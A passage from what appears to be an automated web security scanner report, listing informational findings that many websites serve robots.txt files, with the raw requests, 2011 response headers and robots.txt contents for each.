ETag: "4e3c3-1a5-4a0ab1e4c20c0"
Accept-Ranges: bytes
Content-Length: 421
Connection: close
Content-Type: text/plain

# robots.txt for http://www.admitoneproducts.com/
User-agent: dotbot
Disallow: /
User-agent: *
Disallow: /popup_image # Product enlargement images
Disallow: /custom_products1 # Product customization p
...[SNIP]...

27.70. http://www.adobeflashplayer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adobeflashplayer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobeflashplayer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:26 GMT
Server: Apache
Last-Modified: Sun, 01 Aug 2010 15:19:53 GMT
ETag: "5618be-1b-4c559099"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.71. http://www.advancedlamps.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedlamps.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.advancedlamps.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 14 Jan 2008 12:13:33 GMT
ETag: "351b1e-5d-443ad9ad69540"
Accept-Ranges: bytes
Content-Length: 93
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /admin/
Sitemap: http://www.advancedlamps.com/sitemap.xml

27.72. http://www.aeropostle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aeropostle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aeropostle.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1635438706"
Last-Modified: Tue, 03 May 2011 19:15:58 GMT
Content-Length: 215
Date: Wed, 04 May 2011 01:41:43 GMT
Server: lighttpd

User-agent: *
Disallow: /
Disallow: /sear
Disallow: /imag
Disallow: /redirect.php
Disallow: /site-php/
Disallow: /kwpop.php
Disallow: /uniques.php
Disallow: /contact.php
Disallow: /offer.php
Disallow:
...[SNIP]...

27.73. http://www.afausairways.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afausairways.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.afausairways.org

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:25:38 GMT
Content-Length: 105
Content-Type: text/plain
Last-Modified: Sun, 28 Mar 2010 21:44:28 GMT
Accept-Ranges: bytes
ETag: "c0f977d7bfceca1:9df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *
Disallow: /print_article.cfm
Disallow: /suggest_article.cfm
User-agent: 008
Disallow: /

27.74. http://www.agedpost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agedpost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.agedpost.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 00:44:01 GMT
Content-Type: text/plain
Content-Length: 35
Last-Modified: Tue, 19 Jan 2010 17:17:05 GMT
Connection: close
Expires: Sat, 07 May 2011 00:44:01 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes

User-agent:*
Disallow: /signup.php

27.75. http://www.agoracom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoracom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.agoracom.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:32 GMT
Server: Apache/2.2.13 (Fedora) DAV/2 Phusion_Passenger/2.2.5
Last-Modified: Mon, 19 Oct 2009 20:35:54 GMT
ETag: "620480-83-4764fb12f3e80"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Via: 1.0 ec2-50-16-51-187.compute-1.amazonaws.com
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *
Disallow: /admin

27.76. http://www.aikenstandard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aikenstandard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aikenstandard.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 00:47:01 GMT
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3145525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /_private/
Sitemap: http://www.aikenstandard.com/SiteMapWeb.aspx


27.77. http://www.airport-data.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.airport-data.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.airport-data.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 07 Dec 2008 11:29:59 GMT
ETag: "113b0486-195-45d733afb1bc0"
Accept-Ranges: bytes
Content-Length: 405
Connection: close
Content-Type: text/plain

# robots.txt for http://www.airport-data.com
# new sitemap tag supported by Yahoo, MSN and Google
Sitemap: http://www.airport-data.com/sitemap_index.xml

User-agent: *
Disallow: /member/
Disallow: /ad
...[SNIP]...

27.78. http://www.airporthotelguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.airporthotelguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.airporthotelguide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:01 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 10 Mar 2010 19:47:04 GMT
ETag: "44edcee-1f-4b97f738"
Accept-Ranges: bytes
Content-Length: 31
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /track/

27.79. http://www.airwise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.airwise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.airwise.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:25:52 GMT
Server: Apache
Last-Modified: Mon, 05 Jul 2010 08:55:23 GMT
ETag: "1e8eb4-18-48aa018d734c0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.80. http://www.ajcn.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ajcn.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ajcn.org

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 02:36:45 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 08 Apr 2011 20:33:53 GMT
ETag: "3074246-10ad-4a06e24e9ee40"
Vary: Accept-Encoding
X-SmartBan-URL: /robots.txt
X-SmartBan-Host: www.ajcn.org
Accept-Ranges: bytes
X-Varnish: 2809520849
Age: 0
Via: 1.1 varnish
X-Varnish-Hostname: varnish3.HighWire.ORG
X-Varnish-Cache: miss
Content-Length: 4269


#
# ##################################################################
# ##
# ## THIS IS A GENERATED FILE.
# ##
# ## ANY CHANGES YOU MAKE DIRECTLY TO THIS FILE WILL BE OVERWRITTEN
# #
...[SNIP]...

27.81. http://www.alachuaclerk.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alachuaclerk.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alachuaclerk.org

Response

HTTP/1.1 200 OK
Content-Length: 221
Content-Type: text/plain
Content-Location: http://www.alachuaclerk.org/robots.txt
Last-Modified: Thu, 19 Jan 2006 13:37:16 GMT
ETag: "c64d4376fd1cc61:925"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:57:45 GMT
Connection: close

User-agent: *
Disallow: /lindas/
Disallow: /Alaska/
Disallow: /ccis/
Disallow: /compops/
Disallow: /criminal/
Disallow: /gal/
Disallow: /lindas_obts/
Disallow: /lindas_test/
Disallow: /pajuve
...[SNIP]...

27.82. http://www.alarabiya.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alarabiya.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alarabiya.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:01 GMT
Expires: Wed, 04 May 2011 02:21:01 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 08:40:32 GMT
ETag: "1344353-eb-4a25b17cee000"
Accept-Ranges: bytes
Content-Length: 235
Cache-Control: max-age=3600, must-revalidate
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Age: 102
X-Cache: HIT from 12.120.9.86
Via: 1.1 12.120.9.86:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

User-agent: *
Disallow: /save_print.php
Disallow: /send_article_link.php
Disallow: /bannertest/
Disallow: /send_check_article_lang.php
Disallow: http://beta.alarabiya.net/
Allow: /

Sitemap: h
...[SNIP]...

27.83. http://www.alaskaaircruises.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alaskaaircruises.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alaskaaircruises.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1342
Content-Type: text/plain
Last-Modified: Fri, 14 Jan 2011 17:16:35 GMT
Accept-Ranges: bytes
ETag: "8afe39cceb4cb1:67bf"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:19 GMT
Connection: keep-alive
Set-Cookie: NSC_WJQ-XXX.BMBTLBBJSDSVJTFT.DPN=ffffffff095b1c3845525d5f4f58455e445a4a423662;path=/

# $Header: /WebSites/affiliate/robots.txt 5 9/24/10 10:40a Toleary $
# robot exclusion list
User-agent: *
Disallow: /promotion/cruise411/cashback2/default.asp
Disallow: /promotion/CruisesOnly/
...[SNIP]...

27.84. http://www.aligngi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aligngi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aligngi.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:42 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 16:03:47 GMT
ETag: "fa00f-2d-49ec3ec4b1ec0"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/plain

User-agent: *

Disallow:/digestive_wellness

27.85. http://www.all-free-samples.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.all-free-samples.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.all-free-samples.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:05 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 13:44:37 GMT
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /to.php
Disallow: /taf.php
Disallow: /ad.php

27.86. http://www.allaboutdrawings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allaboutdrawings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allaboutdrawings.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:39:43 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.allaboutdrawings.com/5fN4aVDg.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn
...[SNIP]...

27.87. http://www.allaboutlifechallenges.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allaboutlifechallenges.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allaboutlifechallenges.org

Response

HTTP/1.1 200 OK
Content-Length: 5377
Content-Type: text/plain
Last-Modified: Thu, 28 Feb 2008 20:13:17 GMT
Accept-Ranges: bytes
ETag: "5e26eb5a467ac81:f2f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:59:25 GMT
Connection: close

#robots.txt for AllAboutLifeChallenges.org
User-agent: *
Disallow: /common/
Disallow: /common/*.htm$
User-agent: googlebot
Disallow: /common/
Disallow: /common/*.htm$
User-agent: slurp
Disallo
...[SNIP]...

27.88. http://www.allamericanblogger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allamericanblogger.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allamericanblogger.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:28 GMT
Server: Apache
X-Pingback: http://www.allamericanblogger.com/xmlrpc.php
Set-Cookie: 6ed9cec3561f3e5d5e6ed5f23676f9cb=1304481449; expires=Wed, 04-May-2011 04:57:29 GMT; path=/
Set-Cookie: wwsgd_visits=1; expires=Thu, 03-May-2012 03:57:29 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.allamericanblogger.com/sitemap.xml.gz
<!-- WP Super Cache is installed but broken. The path to wp-cache-phase1.php in wp-content/advanced-cache.php must be
...[SNIP]...

27.89. http://www.allbrands.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allbrands.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allbrands.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:11 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 14:11:22 GMT
ETag: "27-1691f680"
Accept-Ranges: bytes
Content-Length: 39
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /printPage.php

27.90. http://www.allcolleges.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allcolleges.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allcolleges.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:52 GMT
Server: Apache
Last-Modified: Fri, 14 Aug 2009 13:14:19 GMT
ETag: "5a-47119d46ee0c0"
Accept-Ranges: bytes
Content-Length: 90
Vary: Accept-Encoding
Cache-Control: public
Connection: close
Content-Type: text/plain; charset=UTF-8

#Rule for all robots
User-agent: *
Disallow: /form/
Disallow: /form/*
Disallow: /cgi-bin/

27.91. http://www.allgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allgame.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allgame.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:41:29 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 01:35:50 GMT
ETag: "18099a-150-4856a435c6980"
Accept-Ranges: bytes
Content-Length: 336
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Age: 3521
X-Cache: HIT from tul-1
Connection: close

User-agent: Googlebot
Disallow:
Request-rate: 1/5
Crawl-delay: 1

User-agent: Slurp
Disallow:
Request-rate: 1/5
Crawl-delay: 1

User-agent: Teoma
Disallow:
Request-rate: 1/5
Crawl-delay:
...[SNIP]...

27.92. http://www.allhighschools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allhighschools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allhighschools.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 14 Apr 2011 20:03:43 GMT
ETag: "7880ba-26f-4a0e66c13c5c0"
Accept-Ranges: bytes
Content-Length: 623
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /signup.php
Disallow: /claimed.php
Disallow: /*PHPSESSID
Disallow: /edit_profile.php
Disallow: /claim/
Disallow: /images
Disallow: /profile_images
Disallow: /rss
Disallow: /adm
...[SNIP]...

27.93. http://www.alliedbingo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alliedbingo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alliedbingo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:06 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 153
Connection: close
Content-Type: text/plain;charset=iso-8859-1

User-agent: *
Disallow: /cgi-bin/
Disallow: /mail/

User-agent: Slurp
Crawl-delay: 0.5

User-agent: twiceler
Disallow: /

User-agent: cuill
Disallow: /


27.94. http://www.allinterview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allinterview.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allinterview.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 02:39:11 GMT
Content-Type: text/plain
Content-Length: 27
Last-Modified: Fri, 04 Mar 2011 02:17:53 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Allow: /


27.95. http://www.allotment.org.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allotment.org.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allotment.org.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:49:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Fri, 04 Feb 2011 19:14:12 GMT
ETag: "5803de-14f8-49b79aff10900"
Accept-Ranges: bytes
Content-Length: 5368
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /Connections/
Disallow: /_mmServerScripts/
Disallow: /_notes/
Disallow: /admin/
Disallow: /adodb/
Disallow: /cgi-bin/
Disallow: /include/
Disallow: /includes/
Disallow: /sitere
...[SNIP]...

27.96. http://www.alltherapist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alltherapist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alltherapist.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Last-Modified: Wed, 22 Dec 2010 18:09:30 GMT
Accept-Ranges: bytes
Content-Length: 78
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 03:21:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /my-account/
Disallow: /claim/
Disallow: /review/

27.97. http://www.allwrestlingsuperstars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allwrestlingsuperstars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allwrestlingsuperstars.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:13 GMT
Server: Apache
Last-Modified: Tue, 27 Jan 2009 14:00:32 GMT
ETag: "2b35694-b9-46177474be000"
Accept-Ranges: bytes
Content-Length: 185
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-includes/
Disallow: /wp-admin/
Disallow: /wp-content/cache/
Disallow: /wp-content/plugins/
Disallow: /wp-content/themes/
Disallow: /wp-content/upgrade/

27.98. http://www.alpineaccess.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alpineaccess.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alpineaccess.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1943057471"
Last-Modified: Tue, 06 Apr 2010 14:55:14 GMT
Content-Length: 51
Date: Wed, 04 May 2011 02:08:23 GMT
Server: lighttpd/1.4.20

User-agent: *
Disallow: /findyourwayhome
Allow: /


27.99. http://www.alsscanangels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alsscanangels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alsscanangels.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:47:22 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8e
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.alsscanangels.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.alsscanangels.com/sitemap.xml.gz

27.100. http://www.alternativereel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alternativereel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alternativereel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:39 GMT
Server: Apache mod_fcgid/2.3.5
Last-Modified: Mon, 07 Mar 2011 09:16:05 GMT
ETag: "4deb66f-6c-49de0f1fd7f40"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /awstats/
Disallow: /cgi-bin/
Disallow: /cp/
Disallow: /webalizer/

27.101. http://www.altnature.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.altnature.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.altnature.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:31:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 21 Oct 2010 21:34:43 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Age: 0
Server: YTS/1.19.8

User-agent: *
Allow: /

27.102. http://www.alverno.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alverno.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alverno.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 17:22:36 GMT
Accept-Ranges: bytes
ETag: "f06cf36491f0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:40 GMT
Connection: close
Content-Length: 195

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /website/
Disallow: /graphics/
Disallow: /harris/

User-agent: googlebot
Disallow: *.csi

27.103. http://www.amateur-allures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateur-allures.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amateur-allures.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:37 GMT
Server: Apache/1.3.41 (Unix)
X-Pingback: http://www.amateur-allures.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.104. http://www.amateursfreepost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateursfreepost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amateursfreepost.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

27.105. http://www.america-hijacked.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.america-hijacked.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.america-hijacked.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:24 GMT
Server: Apache mod_fcgid/2.3.6 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://america-hijacked.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.106. http://www.american-school-search.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.american-school-search.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.american-school-search.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:51:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 14 Oct 2009 21:36:10 GMT
ETag: "906dc-53-475ebf3822680"
Accept-Ranges: bytes
Content-Length: 83
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
sitemap: http://www.american-school-search.com/sitemap.xml

27.107. http://www.americanmedical-id.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanmedical-id.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanmedical-id.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:47 GMT
Server: Apache
Last-Modified: Wed, 24 Nov 2010 19:40:23 GMT
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /cgi-bin/

27.108. http://www.americanmountainrentals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanmountainrentals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanmountainrentals.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:56 GMT
Server: Apache/1.3.39 (Unix)
Last-Modified: Mon, 23 Jul 2007 19:58:53 GMT
ETag: "48dd9ff-6d-46a5087d"
Accept-Ranges: bytes
Content-Length: 109
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /cgi-bin/
Sitemap: http://www.americanmountainrentals.com/sitemap.xml

27.109. http://www.americanracing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanracing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanracing.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 00:50:45 GMT
Server: Apache/2.2.17 (Win32) PHP/5.3.3
X-Powered-By: W3 Total Cache/0.9.1.3
